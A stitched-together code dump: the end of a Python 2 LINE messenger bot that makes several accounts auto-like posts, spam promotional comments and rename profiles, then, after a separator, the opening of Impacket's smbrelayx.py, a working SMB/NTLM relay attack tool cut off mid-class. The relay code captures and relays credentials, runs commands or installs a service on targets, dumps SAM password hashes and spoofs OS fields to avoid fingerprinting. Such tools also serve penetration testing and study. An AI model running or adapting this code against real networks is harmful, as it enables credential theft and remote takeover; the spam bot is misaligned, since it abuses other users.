print "@Restart"
else:
cl.sendText(msg.to, "No Access")
#--------------------------------------------------------
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def autolike():
for zx in range(0,500):
hasil = cl.activity(limit=500)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(0.01)
#thread3 = threading.Thread(target=autolike)
#thread3.daemon = True
#thread3.start()
#--------------------
def likePost():
for zx in range(0,500):
hasil = cl.activity(limit=500)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in owner:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
print "Like"
except:
pass
else:
print "Status Sudah di Like Boss"
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"]
cl.updateProfile(profile)
profile2 = ki.getProfile()
profile2.displayName = wait["cName2"]
ki.updateProfile(profile2)
profile3 = kk.getProfile()
profile3.displayName = wait["cName3"]
kk.updateProfile(profile3)
profile4 = kc.getProfile()
profile4.displayName = wait["cName4"]
kc.updateProfile(profile4)
profile5 = ks.getProfile()
profile5.displayName = wait["cName5"]
ks.updateProfile(profile5)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
smbrelayx.py
|
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# SMB Relay Module
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# This module performs the SMB Relay attacks originally discovered
# by cDc. It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first to try authenticate against the client connecting
# to us.
#
# It is implemented by invoking a SMB and HTTP Server, hooking to a few
# functions and then using the smbclient portion. It is supposed to be
# working on any LM Compatibility level. The only way to stop this attack
# is to enforce on the server SPN checks and or signing.
#
# If the target system is enforcing signing and a machine account was provided,
# the module will try to gather the SMB session key through
# NETLOGON (CVE-2015-0005)
#
# If the authentication against the targets succeed, the client authentication
# success as well and a valid connection is set against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want to the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
from __future__ import division
from __future__ import print_function
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
import http.server
import socketserver
import argparse
import base64
import logging
import os
import sys
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from binascii import unhexlify, hexlify
from struct import pack, unpack
from threading import Thread
from six import PY2
from impacket import version
from impacket.dcerpc.v5 import nrpc
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.examples import logger
from impacket.examples import serviceinstall
from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections, SOCKS
from impacket.examples.ntlmrelayx.clients.smbrelayclient import SMBRelayClient
from impacket.nt_errors import ERROR_MESSAGES
from impacket.nt_errors import STATUS_LOGON_FAILURE, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NOT_SUPPORTED, \
STATUS_MORE_PROCESSING_REQUIRED
from impacket.ntlm import NTLMAuthChallengeResponse, NTLMAuthNegotiate, NTLMAuthChallenge, AV_PAIRS, \
NTLMSSP_AV_HOSTNAME, generateEncryptedSessionKey
from impacket.smb import NewSMBPacket, SMBCommand, SMB, SMBSessionSetupAndX_Data, SMBSessionSetupAndX_Extended_Data, \
SMBSessionSetupAndX_Extended_Response_Parameters, SMBSessionSetupAndX_Extended_Response_Data, \
SMBSessionSetupAndX_Parameters, SMBSessionSetupAndX_Extended_Parameters, TypesMech, \
SMBSessionSetupAndXResponse_Parameters, SMBSessionSetupAndXResponse_Data
from impacket.smb3 import SMB3
from impacket.smbconnection import SMBConnection
from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile, SMBSERVER
from impacket.spnego import ASN1_AID, SPNEGO_NegTokenResp, SPNEGO_NegTokenInit
try:
from Cryptodome.Cipher import DES, AES, ARC4
except Exception:
logging.critical("Warning: You don't have any crypto installed. You need pycryptodomex")
logging.critical("See https://pypi.org/project/pycryptodomex/")
# Global Variables
# This is the list of hosts that have been attacked already in case -one-shot was chosen
ATTACKED_HOSTS = set()
CODEC = sys.getdefaultencoding()
class doAttack(Thread):
def __init__(self, SMBClient, exeFile, command):
Thread.__init__(self)
if isinstance(SMBClient, SMB) or isinstance(SMBClient, SMB3):
self.__SMBConnection = SMBConnection(existingConnection = SMBClient)
else:
self.__SMBConnection = SMBClient
self.__exeFile = exeFile
self.__command = command
self.__answerTMP = b''
if exeFile is not None:
self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile)
def __answer(self, data):
self.__answerTMP += data
def run(self):
# Here PUT YOUR CODE!
global ATTACKED_HOSTS
if self.__exeFile is not None:
result = self.installService.install()
if result is True:
logging.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception as e:
logging.debug('Exception:', exc_info=True)
# Something wen't wrong, most probably we don't have access as admin. aborting
logging.error(str(e))
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
return
try:
if self.__command is not None:
remoteOps._RemoteOperations__executeRemote(self.__command)
logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__answerTMP = b''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
logging.debug('Raw answer %r' % self.__answerTMP)
try:
print(self.__answerTMP.decode(CODEC))
except UnicodeDecodeError:
logging.error('Decoding error detected, consider running chcp.com at the target,\nmap the result with '
'https://docs.python.org/3/library/codecs.html#standard-encodings\nand then execute smbrelayx.py '
'again with -codec and the corresponding codec')
print(self.__answerTMP)
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception as e:
logging.debug('Exception:', exc_info=True)
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
logging.error(str(e))
finally:
if samHashes is not None:
samHashes.finish()
if remoteOps is not None:
remoteOps.finish()
try:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
except Exception as e:
logging.error(str(e))
pass
class SMBClient(SMB):
def __init__(self, remote_name, extended_security = True, sess_port = 445):
self._extendedSecurity = extended_security
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
SMB.__init__(self,remote_name, remote_name, sess_port = sess_port)
def neg_session(self):
neg_sess = SMB.neg_session(self, extended_security = self._extendedSecurity)
return neg_sess
def setUid(self,uid):
self._uid = uid
def login_standard(self, user, domain, ansiPwd, unicodePwd):
smb = NewSMBPacket()
smb['Flags1'] = 8
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Data()
sessionSetup['Parameters']['MaxBuffer'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VCNumber'] = os.getpid()
sessionSetup['Parameters']['SessionKey'] = self._dialects_parameters['SessionKey']
sessionSetup['Parameters']['AnsiPwdLength'] = len(ansiPwd)
sessionSetup['Parameters']['UnicodePwdLength'] = len(unicodePwd)
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE
sessionSetup['Data']['AnsiPwd'] = ansiPwd
sessionSetup['Data']['UnicodePwd'] = unicodePwd
sessionSetup['Data']['Account'] = user
sessionSetup['Data']['PrimaryDomain'] = domain
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except:
logging.error("Error login_standard")
return None, STATUS_LOGON_FAILURE
else:
self._uid = smb['Uid']
return smb, STATUS_SUCCESS
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
if self._SignatureRequired is True:
if self.domainIp is None:
logging.error("Signature is REQUIRED on the other end, attack will not work")
else:
logging.info("Signature is REQUIRED on the other end, using NETLOGON approach")
def netlogonSessionKey(self, challenge, authenticateMessageBlob):
# Here we will use netlogon to get the signing session key
logging.info("Connecting to %s NETLOGON service" % self.domainIp)
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(respToken2['ResponseToken'] )
_, machineAccount = self.machineAccount.split('/')
domainName = authenticateMessage['domain_name'].decode('utf-16le')
try:
av_pairs = authenticateMessage['ntlm'][44:]
av_pairs = AV_PAIRS(av_pairs)
serverName = av_pairs[NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
except:
logging.debug("Exception:", exc_info=True)
# We're in NTLMv1, not supported
return STATUS_ACCESS_DENIED
stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % self.domainIp
rpctransport = transport.DCERPCTransportFactory(stringBinding)
if len(self.machineHashes) > 0:
lmhash, nthash = self.machineHashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(machineAccount,'', domainName, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName+'\x00', '12345678')
serverChallenge = resp['ServerChallenge']
if self.machineHashes == '':
ntHash = None
else:
ntHash = unhexlify(self.machineHashes.split(':')[1])
sessionKey = nrpc.ComputeSessionKeyStrongKey('', '12345678', serverChallenge, ntHash)
ppp = nrpc.ComputeNetlogonCredential('12345678', sessionKey)
nrpc.hNetrServerAuthenticate3(dce, NULL, machineAccount + '\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, serverName + '\x00',
ppp, 0x600FFFFF)
clientStoredCredential = pack('<Q', unpack('<Q',ppp)[0] + 10)
# Now let's try to verify the security blob against the PDC
request = nrpc.NetrLogonSamLogonWithFlags()
request['LogonServer'] = '\x00'
request['ComputerName'] = serverName + '\x00'
request['ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
request['LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['LogonNetworkTransitive']['Identity']['LogonDomainName'] = domainName
request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 0
request['LogonInformation']['LogonNetworkTransitive']['Identity']['UserName'] = authenticateMessage[
'user_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity']['Workstation'] = ''
request['LogonInformation']['LogonNetworkTransitive']['LmChallenge'] = challenge
request['LogonInformation']['LogonNetworkTransitive']['NtChallengeResponse'] = authenticateMessage['ntlm']
request['LogonInformation']['LogonNetworkTransitive']['LmChallengeResponse'] = authenticateMessage['lanman']
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(clientStoredCredential, sessionKey)
authenticator['Timestamp'] = 10
request['Authenticator'] = authenticator
request['ReturnAuthenticator']['Credential'] = '\x00'*8
request['ReturnAuthenticator']['Timestamp'] = 0
request['ExtraFlags'] = 0
#request.dump()
try:
resp = dce.request(request)
#resp.dump()
except DCERPCException as e:
logging.debug('Exception:', exc_info=True)
logging.error(str(e))
return e.get_error_code()
logging.info("%s\\%s successfully validated through NETLOGON" % (
domainName, authenticateMessage['user_name'].decode('utf-16le')))
encryptedSessionKey = authenticateMessage['session_key']
if encryptedSessionKey != '':
signingKey = generateEncryptedSessionKey(
resp['ValidationInformation']['ValidationSam4']['UserSessionKey'], encryptedSessionKey)
else:
signingKey = resp['ValidationInformation']['ValidationSam4']['UserSessionKey']
logging.info("SMB Signing key: %s " % hexlify(signingKey))
self.set_session_key(signingKey)
self._SignatureEnabled = True
self._SignSequenceNumber = 2
self.set_flags(flags1 = SMB.FLAGS1_PATHCASELESS, flags2 = SMB.FLAGS2_EXTENDED_SECURITY)
return STATUS_SUCCESS
def sendAuth(self, serverChallenge, authenticateMessageBlob):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
smb['Uid'] = self._uid
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
sessionSetup['Parameters']['SecurityBlobLength'] = len(authenticateMessageBlob)
sessionSetup['Data']['SecurityBlob'] = authenticateMessageBlob
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
errorCode = smb['ErrorCode'] << 16
errorCode += smb['_reserved'] << 8
errorCode += smb['ErrorClass']
if errorCode == STATUS_SUCCESS and self._SignatureRequired is True and self.domainIp is not None:
try:
errorCode = self.netlogonSessionKey(serverChallenge, authenticateMessageBlob)
except:
logging.debug('Exception:', exc_info=True)
raise
return smb, errorCode
def sendNegotiate(self, negotiateMessage):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Let's build a NegTokenInit with the NTLMSSP
# TODO: In the future we should be able to choose different providers
blob = SPNEGO_NegTokenInit()
# NTLMSSP
blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
blob['MechToken'] = negotiateMessage
sessionSetup['Parameters']['SecurityBlobLength'] = len(blob)
sessionSetup['Parameters'].getData()
sessionSetup['Data']['SecurityBlob'] = blob.getData()
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except Exception:
logging.error("SessionSetup Error!")
raise
else:
# We will need to use this uid field for all future requests/responses
self._uid = smb['Uid']
# Now we have to extract the blob to continue the auth process
sessionResponse = SMBCommand(smb['Data'][0])
sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters'])
sessionData = SMBSessionSetupAndX_Extended_Response_Data(flags = smb['Flags2'])
sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength']
sessionData.fromString(sessionResponse['Data'])
respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob'])
return respToken['ResponseToken']
class HTTPRelayServer(Thread):
class HTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, server_address, RequestHandlerClass, target, exeFile, command, mode, outputFile,
one_shot, returnStatus=STATUS_SUCCESS, runSocks = False):
self.target = target
self.exeFile = exeFile
self.command = command
self.mode = mode
self.returnStatus = returnStatus
self.outputFile = outputFile
self.one_shot = one_shot
self.runSocks = runSocks
socketserver.TCPServer.__init__(self,server_address, RequestHandlerClass)
class HTTPHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self,request, client_address, server):
self.server = server
self.protocol_version = 'HTTP/1.1'
self.challengeMessage = None
self.target = None
self.client = None
self.machineAccount = None
self.machineHashes = None
self.domainIp = None
global ATTACKED_HOSTS
if self.server.target in ATTACKED_HOSTS and self.server.one_shot:
logging.info(
"HTTPD: Received connection from %s, skipping %s, already attacked" % (
client_address[0], self.server.target))
return
if self.server.target is not None:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], self.server.target))
else:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], client_address[0]))
http.server.SimpleHTTPRequestHandler.__init__(self,request, client_address, server)
def handle_one_request(self):
try:
http.server.SimpleHTTPRequestHandler.handle_one_request(self)
except Exception:
logging.debug("Exception:", exc_info=True)
pass
def log_message(self, format, *args):
return
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_AUTHHEAD(self, message = ''):
self.send_response(401)
self.send_header('WWW-Authenticate', message.decode('utf-8'))
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
def send_error(self, code, message=None):
if message.find('RPC_OUT') >=0 or message.find('RPC_IN'):
return self.do_GET()
return http.server.SimpleHTTPRequestHandler.send_error(self,code,message)
def do_GET(self):
messageType = 0
if PY2:
authorizationHeader = self.headers.getheader('Authorization')
else:
authorizationHeader = self.headers.get('Authorization')
if authorizationHeader is None:
self.do_AUTHHEAD(message = b'NTLM')
pass
else:
#self.do_AUTHHEAD()
typeX = authorizationHeader
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except:
self.do_AUTHHEAD()
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 1:
if self.server.mode.upper() == 'REFLECTION':
self.target = self.client_address[0]
else:
self.target = self.server.target
try:
if self.client is not None:
logging.error('Still performing an attack against %s' % self.client.get_remote_host())
self.send_response(404)
self.end_headers()
return
self.client = SMBClient(self.target, extended_security = True)
self.client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
self.client.set_timeout(60)
except Exception as e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
clientChallengeMessage = self.client.sendNegotiate(token)
self.challengeMessage = NTLMAuthChallenge()
self.challengeMessage.fromString(clientChallengeMessage)
self.do_AUTHHEAD(message = b'NTLM '+base64.b64encode(clientChallengeMessage))
elif messageType == 3:
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '' or self.target == '127.0.0.1':
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = token
clientResponse, errorCode = self.client.sendAuth(self.challengeMessage['challenge'],
respToken2.getData())
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials, except
# when coming from localhost
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
logging.error("Authenticating against %s as %s\\%s FAILED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
self.do_AUTHHEAD('NTLM')
else:
# Relay worked, do whatever we want here...
logging.info("Authenticating against %s as %s\\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.outputFile is not None:
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.outputFile)
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible of removing it from the set
global ATTACKED_HOSTS
if self.target not in ATTACKED_HOSTS:
ATTACKED_HOSTS.add(self.target)
if self.server.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None,urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=self.client)
activeConnections.put(
(self.target, 445, 'SMB', ('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient,
{'CHALLENGE_MESSAGE': self.challengeMessage}))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
else:
clientThread = doAttack(self.client,self.server.exeFile,self.server.command)
self.client = None
clientThread.start()
else:
logging.error('%s is being attacker at the moment, skipping.. ' % self.target)
# And answer 404 not found
self.send_response(404)
self.send_header('WWW-Authenticate', 'NTLM')
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
return
def __init__(self, outputFile=None):
Thread.__init__(self)
self.daemon = True
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.command = None
self.target = None
self.mode = None
self.outputFile = outputFile
self.one_shot = False
self.runSocks = False
def setTargets(self, target):
self.target = target
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Not implemented yet.
pass
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
def run(self):
logging.info("Setting up HTTP Server")
httpd = self.HTTPServer(("", 80), self.HTTPHandler, self.target, self.exeFile, self.command, self.mode,
self.outputFile, self.one_shot, runSocks = self.runSocks)
httpd.serve_forever()
class SMBRelayServer(Thread):
def __init__(self, outputFile = None):
Thread.__init__(self)
self.daemon = True
self.server = 0
self.target = ''
self.mode = 'REFLECTION'
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.returnStatus = STATUS_SUCCESS
self.command = None
self.one_shot = False
self.runSocks = False
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
